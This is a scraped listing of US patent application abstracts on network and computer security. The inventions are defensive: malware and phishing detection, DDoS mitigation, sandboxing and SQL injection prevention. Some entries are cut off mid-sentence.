20080282347Real-time network malware protection - A Network State Database (NSD) can comprise information regarding the network-centric state of one or more computing devices connected to a network. The information contained in the NSD can be passively received by the NSD, or it can be actively obtained by the NSD. Additionally the NSD can comprise either a centralized collection of information, or a distributed collection of information independently maintained and conceptualized as a single entity. The information of the NSD can be used by a Network Risk Management Service (NRMS) to appropriately respond and protect the network. The NRMS can provide relevant information from the NSD to subscribers, which can independently act to protect the network. The NRMS can likewise itself instruct computing devices regarding an appropriate action, or it can itself instruct the performance of such action.11-13-2008
20120151579Network Device, Network Packet Processing Method and Computer Readable Storage Medium for Storing Thereof - A network device builds connection with a network through a Network Interface Card (NIC). The network device includes a processor and a storage unit. The processor includes at least one transmission processing core, at least one security core, and a main core. The storage unit stores a packet receiving module and a packet output module. The main core loads the packet receiving module to receive several packets from the network, makes the at least one transmission processing core process the packets for a network transmission and makes the at least one security core check the packets for security. The main core loads the packet output module to output the packets after the at least one transmission processing core processes the packets for network transmission and the at least one security core checks the packets for security.06-14-2012
20110055922Method for Detecting and Blocking Phishing Attacks - A method for detecting a suspected phishing attack characterized by monitoring strings of characters in a questionnaire presented by a non-approved address to a user terminal for similarity to a substring of a string of sensitive data, such that the substring has a length of one or more characters less than the length of the string of sensitive data, such that on detecting a substring of critical length, an alert is triggered.03-03-2011
20110055921PROTECTING AGAINST DISTRIBUTED NETWORK FLOOD ATTACKS - A network security device performs a three-stage analysis of traffic to identify malicious clients. In one example, a device includes an attack detection module to, during a first stage, monitor network connections to a protected network device, during a second stage, to monitor a plurality of types of transactions for the plurality of network sessions when a parameter for the connections exceeds a connection threshold, and during a third stage, to monitor communications associated with network addresses from which transactions of the at least one of type of transactions originate when a parameter associated with the at least one type of transactions exceeds a transaction-type threshold. The device executes a programmed action with respect to at least one of the network addresses when the transactions of the at least one of the plurality of types of transactions originating from the at least one network address exceeds a client-transaction threshold.03-03-2011
20110055920METHOD AND SYSTEM FOR AUTONOMOUS CONTROL AND PROTECTION OF COMPUTER SYSTEMS - A management system includes a plurality of components within a computer system. A plurality of component resource managers is provided, and each of the components is controlled by at least one of the plurality of component resource managers. A plurality of component management interfaces is also provided. Each of the components communicates with at least one of the controlling component resource managers via one of the component management interfaces. At least one runtime manager autonomously controls operation of the components and the component resource managers.03-03-2011
20080209554Spam honeypot domain identification - Identification of spam honeypot domains is performed automatically by a system 08-28-2008
20120204261SYSTEM AND METHOD FOR UNIFIED COMMUNICATIONS THREAT MANAGEMENT (UCTM) FOR CONVERGED VOICE, VIDEO AND MULTI-MEDIA OVER IP FLOWS - A method and system for unified communications threat management (UCTM) for converged voice and video over IP is disclosed. A computer-implemented method for threat management receives an incoming packet. The incoming packet is broken into sub-packets and fed to a plurality of packet processing engines. Each packet processing engine inspects the sub-packets and annotate the sub-packets with meta-data. The annotated sub-packets are combined and processed by a plurality of application engine to generate a processed packet. The processed packet is classified and stored in a database.08-09-2012
20100325726UNAUTHORIZED OPERATION MONITORING PROGRAM, UNAUTHORIZED OPERATION MONITORING METHOD, AND UNAUTHORIZED OPERATION MONITORING SYSTEM - It is possible to provide an unauthorized operation monitoring program for calculating a modified score by reflecting a suspicious value determined from a series of operations by a user who operates a computer in order to monitor an unauthorized operation on the computer. When a modified score that indicates probability of an unauthorized operation is calculated for an object event, a suspicious value (PSV) corresponding to the level of the calculated modified score is set. When a new event occurs next time, for the score (direct score) calculated for the new event, a modified score reflecting the PSV set for the previous event and a time difference between the previous event and the new event is calculated. When operations that the probability of the unauthorized operation is high are continuously performed, or when operations of which the suspicious value is high are repeated, a higher level of a modified score is calculated.12-23-2010
20110167490SYSTEM AND METHOD FOR SECURE DISTRIBUTED EXECUTION - This invention discloses a method and system for processing logic modules, each having a separate functionality, into a unique functionality that is to be executed in an interlocked mode as a unique functionality. The method is based on taking logic modules (programs and data) with known functionality and transforming them into a hidden program by integrating modules to execute together into a logic which is partially obfuscated and/or encrypted and/or physically hidden. The hidden program is being updated dynamically to strengthen it against reverse engineering efforts. The program includes the functionality for generating security signals, which are unpredictable by observers, such as a pseudo random sequence of security signals. Only elements that share the means for producing the security signals can check their validity. The modules include operational tasks and performance parameters for this operation. The operation can be transmission of data packets with given parameters of performance that the hidden program contains. The generated security signals thus assure that the correct operation was taken place and can be used to signal various cryptographic parameters as well.07-07-2011
20120311706PAYMENT CARD INDUSTRY (PCI) COMPLIANT ARCHITECTURE AND ASSOCIATED METHODOLOGY OF MANAGING A SERVICE INFRASTRUCTURE - A system to ensure compliance with data security standards includes a security appliance to perform multiple security functions, with the security appliance including an initial configuration. The system further includes a display unit to provide information of compliance performance of the system on a secure basis. The system also includes a control unit to monitor compliance performance in real-time and to implement additional procedures required based on the monitored compliance to ensure compliance with data security standards.12-06-2012
20120311705SYSTEM, METHOD, AND COMPUTER PROGRAM PRODUCT FOR PRESENTING AN INDICIA OF RISK REFLECTING AN ANALYSIS ASSOCIATED WITH SEARCH RESULTS WITHIN A GRAPHICAL USER INTERFACE - A system, method, and computer program product comprise presenting a plurality of search results within a graphical user interface. Further, an indicia of risk is presented that reflects an analysis in association with at least one of the plurality of search results within the graphical user interface.12-06-2012
20120311704Method and Apparatus for Efficient Netflow Data Analysis - A flow based detection system for detecting networks attacks on data networks. Flow records are collected in a novel data structure that facilitates efficient sorting. The sorted data structure can be subsequently analyzed in an efficient manner to find out if the network is under attack. An attack is identified if the numbers of unique corresponding addresses or conversations are too large.12-06-2012
20120311703REPUTATION-BASED THREAT PROTECTION - Information concerning a plurality of identified threats provided by a plurality of preselected sources is stored in memory. An e-mail message may be received over a communication network. The received e-mail message is separated into a plurality of components. The stored information is searched to identify a reputation score associated with each of the plurality of components. It is then determined whether the e-mail is a threat based on the identified reputation score of each of the plurality of components. The determination is sent to a designated recipient.12-06-2012
20120311702SYSTEM AND METHOD FOR PRESERVING REFERENCES IN SANDBOXES - Disclosed herein are systems, methods, and non-transitory computer-readable storage media for preserving references in sandboxes. A system implementing the method receives a document for use in a sandbox environment and passes the document to a parser, via a coordinator. The parser finds references in the document to other resources and outputs a list of references. The system passes the list of references to a verifier that verifies each reference and outputs a list of verified references. The system passes the list of verified references to the sandboxed application which extends the sandbox to include the resources on the list of verified references. In one embodiment, the system preserves references in sandboxes without the use a coordinator.12-06-2012
20110138463METHOD AND SYSTEM FOR DDOS TRAFFIC DETECTION AND TRAFFIC MITIGATION USING FLOW STATISTICS - Disclosed are a method and system for distributed denial of service (DDoS) attack detection and traffic mitigation using flow statistics. The method for DDoS attack detection and traffic mitigation using flow statistics includes: collecting first statistics for each flow based on flow information generated by traffic flow of a network connection device; and grouping the first statistics for each flow on a per-flow basis and processing the same into second statistics containing at least one of the number of bytes, the number of packets, and the number of flows per unit time.06-09-2011
20110138464STATE NOTIFICATION APPARATUS, STATE NOTIFICATION METHOD, AND COMPUTER-READABLE STORAGE MEDIUM - A state notification apparatus comprises: a holding unit that, when one or more secure runtime environments and one or more non-secure runtime environments are selectively executed in a foreground, holds an identifier of a runtime environment that is being executed in the foreground; a determination unit that determines a state of the runtime environment executed in the foreground based on the identifier held by the holding unit; and a notification unit that causes a hardware device that cannot be accessed from the one or more non-secure runtime environments to notify the state determined by the determination unit.06-09-2011
20110138462SYSTEM AND METHOD FOR DETECTING VOIP TOLL FRAUD ATTACK FOR INTERNET TELEPHONE - Provided is a system for detecting a voice over Internet protocol (VoIP) toll fraud attack. The system includes: a database (DB) storing registration information of normal users; a packet reception module receiving a call set-up packet from a network; and a VoIP signaling message forgery/falsification detection module receiving the call set-up packet from the packet reception module and comparing sender address information or header information of the call set-up packet with the registration information stored in the DB to detect whether the call set-up packet is a packet received from one of the normal users.06-09-2011
20100180341METHOD FOR PROTECTION A NETWORK THROUGH PORT BLOCKING - A method for protecting a network against a security attack from an user, and in particular, for a layer 2 switch, against a MAC flooding attack. Here, the MAC flooding attack floods the layer 2 switch with at least one packet, a database is provided which saves a MAC address and its allocation and the database has a maximum quantity. According to the method, an interface between the user of the network and a network access functions as a line of demarcation. When the limit of the maximum quantity for a port is reached, the port is blocked during a blocking time. This not only protects the first access node, but also the following network nodes and users respectively, against a security attack.07-15-2010
20100115613Cacheable Mesh Browsers - Methods and systems for improving the end-user experience by reducing the latency of data access across networks by accessing peer browser caches are disclosed. In one embodiment, a method of accessing a web data element includes: transmitting a first request for the web data element from a first browser to a home location of the web data element; transmitting a second request for the web data element from the first browser to one or more hosts including a second browser accessible by the first browser; receiving a cached copy of the web data element by the first browser from the second browser; and displaying the cached copy of the web data element. In another embodiment, a method of improving access to a web data element, includes: receiving a copy of the web data element at a first browser in response to a first request initiated from the first browser; storing the copy of the web data element in a cache controlled by the first browser as a cached web data element; receiving a request for the web data element from a second browser; and providing a copy of the cached web data element to the second browser.05-06-2010
20100115615SYSTEM AND METHOD FOR DYNAMIC AND REAL-TIME CATEGORIZATION OF WEBPAGES - A system and method for categorizing content on a webpage is disclosed. The method comprises receiving a request for a webpage from a user's computer. Next, the system determines whether there is dynamic content on the webpage by analyzing the address, links, reputation, type, style and other indicators of being able to easily change the webpage. If the webpage contains content that can be changed, then the webpage is analyzed to determine a current categorization thereof. If the webpage does not have dynamic content then the categorization of the webpage will remain the same thereby freeing system resources by only analyzing dynamic webpages.05-06-2010
20100115614DATA LOSS PROTECTION THROUGH APPLICATION DATA ACCESS CLASSIFICATION - A method and apparatus for classifying behavior of an application based on its data access pattern is described. In one embodiment, the method includes monitoring file access events associated with an application, and determining whether at least one of the file access events indicates the application's attempt to manipulate data of a file. If at least one file access event indicates the application's attempt to manipulate the data within the file, then at least one action is caused to be performed.05-06-2010
20100077478Method and Apparatus for Publishing Documents Over a Network - An apparatus and method for publishing an electronic document on a network is described. In one embodiment, an apparatus for publishing an electronic document on a wide area network comprising at least one server and a client, a client having memory for storing an electronic document, and means for sending the electronic document to the server, wherein a URL is associated with the electronic document, a security key associated with the URL, and means for sending a URL to a user.03-25-2010
20110179483METHODS FOR HANDLING A FILE ASSOCIATED WITH A PROGRAM IN A RESTRICTED PROGRAM ENVIRONMENT - Techniques for handling a file associated with a program are described herein. According to an aspect of the invention, in response to a request for accessing a file received through a first program, the file is stored in a first sandboxed storage area, where the file is to be accessed by a second program. An atomic move operation is then performed on the file that atomically moves the file from the first sandboxed storage area to a second sandboxed storage area, where the first sandboxed storage area is not accessible to the first program and second program. The second program is launched to access the file stored in the second sandboxed storage area, where the second sandboxed storage area is a part of a sandbox associated with the second program.07-21-2011
20110179484MALWARE DETECTION SYSTEM AND METHOD FOR MOBILE PLATFORMS - In one example, a management server is configured to provide malware protection for one or more client mobile platforms in communication with the management server via a mobile network. In the example, the management server includes a processor configured to detect malware in the mobile network, select a client mobile platform having a malware scanning agent, and, manage the malware scanning agent of the client mobile platform using a device independent secure management protocol based at least in part on the malware detected in the mobile network.07-21-2011
20100263046SECURITY WRAPPER METHODS AND SYSTEMS - In one example, a web content security system embedded in a computer-usable storage medium that identifies potential threats when executed by one or more processors is provided. The web content security system includes a communications monitor module that monitors at least one of data communications between web objects on a web page and data communications between web objects on a web page and a server, and that identifies a potential threat based on the data communications. A logger module generates report data based on the identified potential threat.10-14-2010
20120151581METHOD AND SYSTEM FOR INFORMATION PROPERTY MANAGEMENT - A system for managing sensitive information property, includes a monitoring agent installed in a host system needed for sensitive information property management and configured to monitor the sensitive information property; an information property storage configured to store a list of the sensitive information property for the host system; and an information property manager configured to determine whether or not the sensitive property has leaked.06-14-2012
20090300760Grid Security Intrusion Detection Configuration Mechanism - A method, apparatus, and article of manufacture are provided to support security in a distributed gird computer cluster. Each non-node root node in the cluster is configured with a local security agent, and the root node is configured with a security controller to manage each of the security agents of each non-root node. The security agent of each non-root node is in communication with an associated configuration file that contains data private to the respective non-root node, to allow the security agent to manage security local to the node. The security controller of the root node is in communication with a controller configuration file that contains data that applies to all security agents in the grid cluster, to allow the controller to manager the security agents.12-03-2009
20090293121DEVIATION DETECTION OF USAGE PATTERNS OF COMPUTER RESOURCES - Embodiments of the invention provide a method for detecting changes in behavior of authorized users of computer resources and reporting the detected changes to the relevant individuals. The method includes evaluating actions performed by each user against user behavioral models and business rules. As a result of the analysis, a subset of users may be identified and reported as having unusual or suspicious behavior. In response, the management may provide feedback indicating that the user behavior is due to the normal expected business needs or that the behavior warrants further review. The management feedback is available for use by machine learning algorithms to improve the analysis of user actions over time. Consequently, investigation of user actions regarding computer resources is facilitated and data loss is prevented more efficiently relative to the prior art approaches with only minimal disruption to the ongoing business processes.11-26-2009
20110154487SOFTWARE BEHAVIOR MODELING DEVICE, SOFTWARE BEHAVIOR MODELING METHOD, SOFTWARE BEHAVIOR VERIFICATION DEVICE, AND SOFTWARE BEHAVIOR VERIFICATION METHOD - A software behavior modeling device which forms a model of a behavior of software includes; an event information acquisition unit configured to acquire event information indicating a specific event which occurs during execution of the software; a stack information acquisition unit configured to acquire stack information stored in a call stack at a time of occurrence of the specific event; a score setting unit configured to set a score in accordance with a storage location in which each element included in the stack information is stored in the call stack; and a model generating unit configured to form a model of a relationship between the specific event and the element by using the score, and to generate a behavior model of the software.06-23-2011
20110265181METHOD, SYSTEM AND GATEWAY FOR PROTECTION AGAINST NETWORK ATTACKS - A method, a system and a gateway for protection against network attacks are provided. The method includes: receiving source request information and destination request information that are sent by a client, where the destination request information is notified by a Domain Name System (DNS) to the client sending the source request information; checking the source request information and the destination request information; and discarding the source request information and the destination request information when the checking result is undesirable. Through the technical solution, the DNS selects the destination request information according to the source request information sent by the client, and establishes a corresponding relation between the client and a server according to a matching relation between the source request information and the destination request information, so as to prevent DDOS attacks.10-27-2011
20110265180TAMPERING MONITORING SYSTEM, MANAGEMENT APPARATUS, AND MANAGEMENT METHOD - An information security apparatus (10-27-2011
20110265179RESTRICTING USER ACCESS ON SHARED COMPUTER - A method for restricting, based on predefined user profile information, access to software executing on a computing device of a user. The method comprises the following steps. Input data is intercepted from a user input device. The input data is compared with a list of restrictions in the user profile information to determining if an action associated with the input data is prohibited. The input data is passed to the software for execution only if the action associated with the input data is not prohibited. A method for restricting, based on predefined user profile information, access to notifications generated for a user is also provided.10-27-2011
20100031356BINDING UPDATE METHOD IN MIPv6 - A binding update method in MIPv6 is provided which includes: a first step of allowing a mobile node to generate a HoTI (Home Test Init) message including a HoA (Home Address) encoded with a product of a first prime number and a second prime number and to transmit the HoTI message to a corresponding node through a home agent along with a first index; a second step of allowing the mobile node to generate a CoTI (Care of Test Init) message including a CoA (Care-of Address) encoded with a product of the first prime number and a third prime number and to transmit the CoTI message directly to the corresponding node along with a second index; a third step of allowing the corresponding node to generate a HoT (Home of Test) message including a first nonce and to transmit the HoT message to the mobile node through the home agent; a fourth step of allowing the corresponding node to generate a CoT (Care-of Test) message including a second nonce and to transmit the CoT message to the mobile node; a fifth step of allowing the mobile node to generate a BU (Binding Update) message by adding the first prime number to the first nonce and the second nonce included in the HoT message and the CoT message and to transmit the BU message to the corresponding node; and a sixth step of allowing the corresponding node to verify the BU message using an exclusive OR operation and a factorization operation in prime numbers with the first prime number and to transmit a BA (Binding Ack) message to the mobile node.02-04-2010
20100031353Malware Detection Using Code Analysis and Behavior Monitoring - Aspects of the subject matter described herein relate to malware detection using code analysis and behavior monitoring. In aspects, an anti-malware engine performs static analysis on program code and monitors behavior of the program code that is exhibited when the program code executes in a virtual and/or non-virtual environment. The anti-malware engine combines the results of both types of malware detection to determine whether the program code includes malware. The anti-malware engine may use feedback from one or more of the malware detection mechanism to direct additional malware detection (e.g., static and/or behavior detection) for the program code.02-04-2010
20100024032METHOD AND APPARATUS FOR EFFECTING AN INTERNET USER'S PRIVACY DIRECTIVE - Disclosed is a method for effecting an internet user's privacy directive. In the method, copied packets, that are based on original packets sent from a user client, are monitored for a web content request including state information that is not in compliance with a user's privacy directive. Upon detection of a copied packet having a web content request including noncompliant state information, the state information is modified to comply with the user's privacy directive. A replacement packet is forwarded to the user client such that the user client receives the replacement packet before receiving a response packet from a target server of the corresponding original packet. The replacement packet has a redirection with a renewed web content request including the modified state information.01-28-2010
20100017878PRECISE WEB SECURITY ALERT - A method for providing an alert when a potentially or likely malicious web site is browsed to by a user. The method maintains web site identification details. If a web site purporting to be a known, previously identified, encountered and utilized web site is browsed to and requests information, the user is alerted to the precise differences between the stored web site historical identity and the identity of the present requester.01-21-2010
20100017877METHODS AND SYSTEMS FOR DETERMINING FILE CLASSIFICATIONS - A computer-implemented method for determining file classifications. The method may include determining identification information of a first file stored on a first computing system. The method may also include querying a second computing system for classification information by sending the identification information of the first file to the second computing system. The first computing system may receive, in response to the query, identification information of a second file. The first computing system may also receive the classification information. The classification information may indicate that the first file and second file are trusted. The first computing system may use the identification information of the second file to determine that the second file is stored on the first computing system. The first computing system may also apply the classification information to the first and second files by excluding the first and second files from a security scan.01-21-2010
20080313734DISTRIBUTED SYSTEM AND METHOD FOR THE DETECTION OF eTHREATS - The invention relates to a distributed system for detecting eThreats that propagate in a network, which comprises: (a) graphs database storing at least one propagation graph, each graph describing the typical propagation over time of one eThreat class or a legitimate executable class within the network; (b) plurality of agents that are distributed in corresponding plurality of hosts within the network, each of said agents continuously monitoring the corresponding host and reporting to a Central Decision Maker (CDM) the identity of any new suspected executable, and the time in which said suspected executable has been first detected by said agent; (c) a CDM for: (c.1) receiving all said reports from said plurality of agents; (c.2) creating from said reports for each suspected executable a corresponding propagation graph which reflects the propagation characteristics over time of said suspected executable within the network, and (c.3) comparing each of said created graphs with said stored at least one propagation graph; (c.4) upon finding a similarity above a predefined threshold between a created graph and one of the stored graphs, concluding respectively that said executable belongs to the class as defined by said stored graph; and (c.5) conveying said conclusion to said agents, for optionally taking an appropriate action.12-18-2008
20090165135SYSTEM AND METHODS FOR DETECTING SOFTWARE VULNERABILITIES AND MALICIOUS CODE - A system and method determines whether software includes malicious code. A validation machine is instrumented with tools and monitors that capture the static and dynamic behavior of software. Software under examination is executed on the validation machine, and the tools and monitors are used to log data representative of the behavior of the software to detect vulnerable or malicious code. If possible, one or more operations are automatically performed on the software to enhance the security of the software by neutralizing the vulnerable or malicious code. Activities that cannot be neutralized automatically are flagged for human inspection. The software executed on the validation machine may be source code or non-source code, with different operations being disclosed and described in each case.06-25-2009
20120210426ANALYSIS SYSTEM FOR UNKNOWN APPLICATION LAYER PROTOCOLS - An analysis system for unknown application layer protocols, which could automatically discover unknown applications existing in a network, and then obtain keywords, attribute values, status codes or type codes representing semantic meaning of each field in each type of unknown application as well as message formats, dialogue rules and status transfer relations of application layer protocols by using cluster analysis and optimal partitioning method based on hidden semi-Markov model. Unknown application analysis result could be used for flow management and safety protection of a network. The system has the following advantages: it avoids difficulties arising from manual discovery and analysis of unknown applications, and improves network management efficiency and responding speed against new types of network attacks.08-16-2012
20110307954SYSTEM AND METHOD FOR IMPROVING COVERAGE FOR WEB CODE - A system and method for improving code coverage for web code that is analyzed for security purposes by dynamic code execution are described. A controller receives information, routes the information to the appropriate engine, analyzer or module and provides the functionality for improving code coverage for code analyzed for security purposes. A code rewrite engine rewrites code in such a way that all branches and stray functions will be executed. A dynamic analyzer performs dynamic analysis on web content to detect malicious code. Additionally, a static analyzer performs static analysis on web content. The static analyzer scans web content and detects a style of coding, a style of obfuscation of the code or patterns in the code.12-15-2011
20090007267METHOD AND SYSTEM FOR TRACKING AUTHORSHIP OF CONTENT IN DATA - According to one aspect of the invention, iterative local alignment is employed to process two versions of a text and to identify novel contributions and their positions in the newer text version. In one embodiment, the new or target version of the text is aligned to the old or reference version of the text in an iterative process. The iterative process produces a local alignment of both text versions, which is optimal according to the selected parameters. In another embodiment, aligned substrings are removed from the texts and the iterative process is continued until no more aligned substrings can be obtained. In one example, authorship may be transferred from every aligned substring of the reference text version to the corresponding substring of the target text version. In another example, authorship for unaligned substrings of the target text version may be assigned to the author of the target text version. In one embodiment, unaligned substrings of the reference text version can be identified as deleted by the author of the target text version. In another embodiment, deleted substrings can be stored latently and can be considered in subsequent alignments. In another aspect of the invention, the method and system for tracking authorship of content in data may be employed in collaborative text editing systems or in word processing applications to identify and track the contributions of individual authors.01-01-2009
20120042381METHOD AND SYSTEM FOR DETERMINING WHETHER DOMAIN NAMES ARE LEGITIMATE OR MALICIOUS - A system and method for determining whether at least one domain is legitimate or malicious by obtaining passive DNS query information, using the passive DNS query information to measure statistical features of known malicious domain names and known legitimate domain names, and using the statistical features to determine at least one reputation for at least one new domain, where the reputation indicates whether the at least one new domain is likely to be for malicious or legitimate uses.02-16-2012
20120042382SYSTEM AND METHOD FOR MONITORING AND ANALYZING MULTIPLE INTERFACES AND MULTIPLE PROTOCOLS - The present invention is a system and method for providing security for a mobile device by analyzing data being transmitted or received by multiple types of networks. The invention can provide security for many types of network interfaces on a mobile device, including: Bluetooth, WiFi, cellular networks, USB, SMS, infrared, and near-field communication. Data is gathered at multiple points in a given processing pathway and linked by a protocol tracking component in order to analyze each protocol present in the data after an appropriate amount of processing by the mobile device. Protocol analysis components are utilized dynamically to analyze data and are re-used between multiple data pathways so as to be able to support an arbitrary number of network data pathways on a mobile device without requiring substantial overhead.02-16-2012
20120042380SECURE MODULE AND INFORMATION PROCESSING APPARATUS - A secure module includes a generating unit that executes generation processing of generating a scanning program that causes scan processing, which generates unique code for a program under test, to be executed at a connected device and further executes update processing of randomly updating contents of the scanning program; a storage device storing therein the unique code for the program under test; and an authenticating unit that if the scanning program is executed by the connected device and executed with respect to the program under test stored at a designated storage area in the connected device, authenticates validity of the program under test stored at the designated storage area, based on the unique code stored in the storage device and execution results of the scanning program executed at the connected device.02-16-2012
20080276315ANTI-PHISHING FILTER - A method operates to detect personal identifying or account information exchanged in a real-time electronic communication occurring between computer network users, such as electronic chat. A detected personal identifier may be recognized as an attempt on the part of one user to engage in a phishing attack upon another user or to otherwise steal the other user's sensitive personal information. Upon recognizing the communication as an unwarranted attempt to collect such information, the electronic communication may be monitored, and communication of the personal information may be prevented.11-06-2008
20120066764METHOD AND APPARATUS FOR ENHANCING SECURITY IN A ZIGBEE WIRELESS COMMUNICATION PROTOCOL - The present invention relates to a technique for solving security vulnerability of a ZigBee wireless communication protocol frequently used as a low-power wireless communication protocol in a home network, a sensor network, or the like, and an apparatus therefor. An ACL security hardware block having diverse security functions is proposed, and a safe and reliable ZigBee wireless communication protocol is provided by applying a method of effectively detecting a replay attack, a method of efficiently managing a group key, and a method of detecting transmission of the same nonce value in advance.03-15-2012
20120066762SYSTEM AND METHOD OF WHITELISTING PARENT VIRTUAL IMAGES - In embodiments of the present invention improved capabilities are described for virtual machine scan optimization. In response to a change in the primary virtual machine, the virtual machine scan optimization may involve comparing the primary virtual machine to the related virtual machine and tracking changes of the primary virtual machine with respect to the related virtual machine wherein the changes are identified by location within the primary virtual machine; forming a tracked changes log; generating a relevant file map of the primary virtual machine wherein the relevant file map includes a plurality of relevant files and each of the plurality of relevant files' locations in the primary virtual machine; comparing the changed locations identified in the track changes log with the locations of the plurality of relevant files to determine if any one of the plurality of relevant files has been changed; and in the event that a relevant file has been changed, as indicated by the comparison of the relevant file map to the tracked changes log, causing the changed relevant file to be security scanned.03-15-2012
20120047577SAFE URL SHORTENING - A safe URL shortening service creates a short URL from any valid long URL. At resolution time, the service determines if the resulting URL points to a known bad, known good, or unknown site. Depending on the determination results, the service may redirect a user to the target site, block redirection, or present a warning page that allows the user to manually activate the target link.02-23-2012
20120047578Method and System for Device Integrity Authentication - Device integrity authentication is performed by receiving, at a second device, data from a first device. A determination is made at the second device as to whether at least a portion of the data is associated with a protected datatype. A measured integrity value of the first device is determined in response to the portion of the data being associated with the protected datatype. The measured integrity value of the first device is compared to an embedded integrity value associated with the second device. Application of at least one of a plurality of policies associated with processing the data is facilitated at the second device based on the comparison and the protected datatype.02-23-2012
20120047576Hardware-Implemented Hypervisor for Root-of-Trust Monitoring and Control of Computer System - A system and method for modifying a processor system with hypervisor hardware to provide protection against malware. The processor system is assumed to be of a type having at least a CPU and a high-speed bus for providing data links between the CPU, other bus masters, and peripherals (including a debug interface unit). The hypervisor hardware elements are (1) a co-processor programmed to perform one or more security tasks; (2) a communications interface between the co-processor and the debug interface unit; (3) a behavioral interface on the high-speed bus, configured to monitor control signals from the CPU, and (4) an access controller on the high-speed bus, configured to store access control data, to intercept requests on the high-speed bus, to evaluate the requests against the access control data, and to grant or deny the requests.02-23-2012
20120210420Systems and Methods of Probing Data Transmissions for Detecting Spam Bots - A computer-implemented system and method for detecting, by a mail server module, spam bot activity by a client device. An email session is conducted between the mail server module and the client device according to a predetermined protocol that includes exchange of messages between the mail server module and the client device. The mail server module probes compliance with the predetermined protocol including: purposefully introducing at least one irregularity into a first message from the mail server module; monitoring a subsequent message transmission from the client device; comparing the subsequent message against reference criteria; and producing a reputability determination for the client device based on an extent to which the subsequent message was a proper response to the at least one irregularity according to the predetermined protocol, the reputability determination being indicative of a likelihood that the client device conducts spam bot activity.08-16-2012
20120210421MALICIOUIS USER AGENT DETECTION AND DENIAL OF SERVICE (DOS) DETECTION AND PREVENTION USING FINGERPRINTING - A method may include receiving a session control protocol request message and fingerprinting the received session control protocol message. The method may further include comparing the fingerprint of the received request message to a list of fingerprints associated with known malicious user agents and rejecting the request message when the fingerprint of the received message matches any fingerprint in the list of fingerprints associated with known malicious user agents. The method may include comparing the fingerprint of the received request message to the list of fingerprints associated with known non-malicious user agents and accepting the request message when the fingerprint of the received message matches any fingerprint in the list of fingerprints associated with known non-malicious user agents.08-16-2012
20120210425Network Surveillance - A method of network surveillance includes receiving network packets handled by a network entity and building at least one long-term and at least one short-term statistical profile from a measure of the network packets that monitors data transfers, errors, or network connections. A comparison of the statistical profiles is used to determine whether the difference between the statistical profiles indicates suspicious network activity.08-16-2012
20120005749Generic Fraud Detection Model - A method for dynamically updating a model is described. The method includes accessing a model that specifies expected characteristics for a transaction. The model includes variables associated with fraud. The method also includes receiving at least one value for each of the variables while monitoring transactions, and updating a distribution of values for each variable based on the received value. The received value is compared with the updated distribution to determine a deviation from a threshold value associated with a percentile of the updated distribution that is indicative of fraud.01-05-2012
20080289037SYSTEMS AND METHODS TO SECURE RESTRICTED INFORMATION IN ELECTRONIC MAIL MESSAGES - Systems and methods are provided to secure restricted information in electronic mail messages. According to some embodiments, it is determined at a client device that an email message is being generated by a user. A security classification may be associated with the email message, and the email message may be sent toward a destination along with an indication of the security classification, wherein the email message is routed based, at least in part, on the security classification.11-20-2008
20120117644System and Method for Internet Security - A computer implemented method for preventing SQL injection attacks comprises intercepting a web request associated with a web service at a first software hook in a first web service execution context, persisting at least a portion of the intercepted web request in a storage location associated with the first software hook and accessible to at least one additional execution context, intercepting a database query generated by at least one web service processing operation at a second software hook associated with the execution of the query, wherein the query is generated in response to the intercepted web request and the second hook retrieves the persisted portion of the intercepted web request, comparing a portion of the persisted portion of the intercepted web request with at least a portion of the intercepted database query, and determining, prior to the query being executed, whether the query corresponds to a potential SQL injection attack.05-10-2012
20120180127SYSTEM AND METHOD FOR IMPLEMENTING A HIDDEN SERVER - A technology for preventing network attacks. A service request is intercepted at an unaddressed port of a hidden device from a second device. The service request intended for a visible device is processed by the hidden device. A response may be provided based on the processing and sent to the second device.07-12-2012
20120180126Probable Computing Attack Detector - A probable computing attack detector monitors electrical power consumption of a computing device. Task data may be acquired for at least one task operating on the computing device. A predicted electrical power consumption may be calculated for the computing device employing a user-centric power model and the task data. A probable attack may be detected when the electrical power consumption disagrees with the predicted electrical power consumption by a determined margin.07-12-2012
20120023578MALICIOUS CODE DETECTION - A device includes a pipeline and a detector that are both implemented at least in hardware. Data is moved through the pipeline to perform processing of the data unrelated to detection of malicious code. The detector detects the malicious code within the data as the data is moved through the pipeline, in parallel with the processing of the data as the data is moved through the pipeline. The detector detects the malicious code within the data as the data is moved through the pipeline without delaying movement of the data into, through, and out of the pipeline.01-26-2012
20120023577VERIFYING WORK PERFORMED BY UNTRUSTED COMPUTING NODES - Techniques for verifying work performed by untrusted computing nodes are provided. A central computing system determines a first computation that is to be performed, at least in part, by a first untrusted computing node. The central computing system also determines a transformation function that is applied to the first computation to produce an equivalent second computation that is to be performed, at least in part, by a second untrusted computing node. The central computing system assigns the first computation to the first untrusted computing node and the second computation to the second untrusted computing node while keeping the transformation function secret. The central computing system receives a first result for the first computation and a second result for the second computation. The central computing system analyzes the first and second results to verify the work performed by the first and second untrusted computing nodes.01-26-2012
20080289039METHOD AND SYSTEM FOR PROTECTING A MESSAGE FROM AN XML ATTACK WHEN BEING EXCHANGED IN A DISTRIBUTED AND DECENTRALIZED NETWORK SYSTEM - A system may include an attack preventing creator module that is configured to create at least one attack preventing head block for a message having message elements in a tree structure with one or more of the message elements being signed, wherein the attack preventing header block includes structure specific information that comprises at least a digest value of a pre-order traversal list of the tree structure and for each signed message element a unique ID attribute, a depth, a parent's name and a parent's ID attribute. The system may include an attack preventing verifier module that is configured to verify the at least one attack preventing header block by comparing the structure specific information which can be derived from the message with the structure specific information carried by the first attack preventing header block.11-20-2008
20120159619Formal Analysis of the Quality and Conformance of Information Flow Downgraders - Mechanisms for evaluating downgrader code in application code with regard to one or more security guidelines are provided. Downgrader code in application code is identified, where the downgrader code is a portion of code in the application code that operates on an information flow of the application code to ensure confidentiality of information input to the downgrader code, in the output of the downgrader code. Processes of the downgrader code are evaluated against security guidelines to determine if the processes violate the security guidelines. A notification is generated in response to the evaluation indicating that the processes of the downgrader code violate the security guidelines. The notification is output to a computing device for consideration.06-21-2012
